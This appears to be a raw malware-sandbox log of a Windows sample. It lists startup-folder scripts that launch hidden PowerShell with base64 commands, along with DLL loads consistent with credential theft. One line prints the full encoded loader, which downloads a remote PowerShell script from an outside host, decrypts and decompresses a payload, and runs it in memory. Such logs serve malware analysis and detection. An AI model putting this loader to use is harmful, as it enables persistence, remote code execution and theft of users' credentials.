              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5
BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
